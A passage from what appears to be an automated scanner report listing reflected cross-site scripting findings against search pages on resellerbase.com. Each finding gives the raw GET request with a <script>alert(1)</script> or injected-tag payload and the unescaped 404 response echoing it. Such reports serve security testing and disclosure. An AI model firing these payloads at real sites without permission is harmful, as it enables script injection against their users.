This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d0955<a>3143424d8f8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d0955<a>3143424d8f8 was not found on this server.</p>
...[SNIP]...

2.2608. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc7e8<script>alert(1)</script>9cdecde9986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildc7e8<script>alert(1)</script>9cdecde9986/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildc7e8<script>alert(1)</script>9cdecde9986/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2609. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59bd6<script>alert(1)</script>01f30bf0353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3859bd6<script>alert(1)</script>01f30bf0353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3859bd6<script>alert(1)</script>01f30bf0353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2610. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2717<script>alert(1)</script>ecd553d6e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themesd2717<script>alert(1)</script>ecd553d6e73/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themesd2717<script>alert(1)</script>ecd553d6e73/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2611. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c2ec<script>alert(1)</script>419407653e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos8c2ec<script>alert(1)</script>419407653e8/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos8c2ec<script>alert(1)</script>419407653e8/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2612. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 638e5<script>alert(1)</script>0406d330f0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images638e5<script>alert(1)</script>0406d330f0d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images638e5<script>alert(1)</script>0406d330f0d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2613. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d196<script>alert(1)</script>a7a5d58b9d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/search.php4d196<script>alert(1)</script>a7a5d58b9d1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php4d196<script>alert(1)</script>a7a5d58b9d1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2614. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 32332<a>28cb641e1be was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search32332<a>28cb641e1be&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search32332<a>28cb641e1be&opt=2 was not found on this server.</p>
...[SNIP]...

2.2615. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 98fd8<a>413e484773d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...98fd8<a>413e484773d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...98fd8<a>413e484773d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2616. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35650<script>alert(1)</script>1faa9c7416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&35650<script>alert(1)</script>1faa9c7416=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&35650<script>alert(1)</script>1faa9c7416=1 was not found on this server.</p>
...[SNIP]...

2.2617. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fb503<a>1095d1eb1d7 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fb503<a>1095d1eb1d7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fb503<a>1095d1eb1d7 was not found on this server.</p>
...[SNIP]...

2.2618. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f0b7<script>alert(1)</script>22129f024c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7f0b7<script>alert(1)</script>22129f024c5/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7f0b7<script>alert(1)</script>22129f024c5/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2619. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6a88c<script>alert(1)</script>65e332ead2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/386a88c<script>alert(1)</script>65e332ead2/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/386a88c<script>alert(1)</script>65e332ead2/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2620. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bcc5<script>alert(1)</script>76faf27eb94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes5bcc5<script>alert(1)</script>76faf27eb94/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes5bcc5<script>alert(1)</script>76faf27eb94/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2621. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6fe4b<script>alert(1)</script>4321b55547a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos6fe4b<script>alert(1)</script>4321b55547a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos6fe4b<script>alert(1)</script>4321b55547a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2622. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8173a<script>alert(1)</script>9d02acca01c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/search.php8173a<script>alert(1)</script>9d02acca01c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php8173a<script>alert(1)</script>9d02acca01c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2623. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cba75<a>5925c223941 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Searchcba75<a>5925c223941&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Searchcba75<a>5925c223941&opt=2 was not found on this server.</p>
...[SNIP]...

2.2624. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 81edb<a>a4a4ae2ee5c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...81edb<a>a4a4ae2ee5c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...81edb<a>a4a4ae2ee5c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2625. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
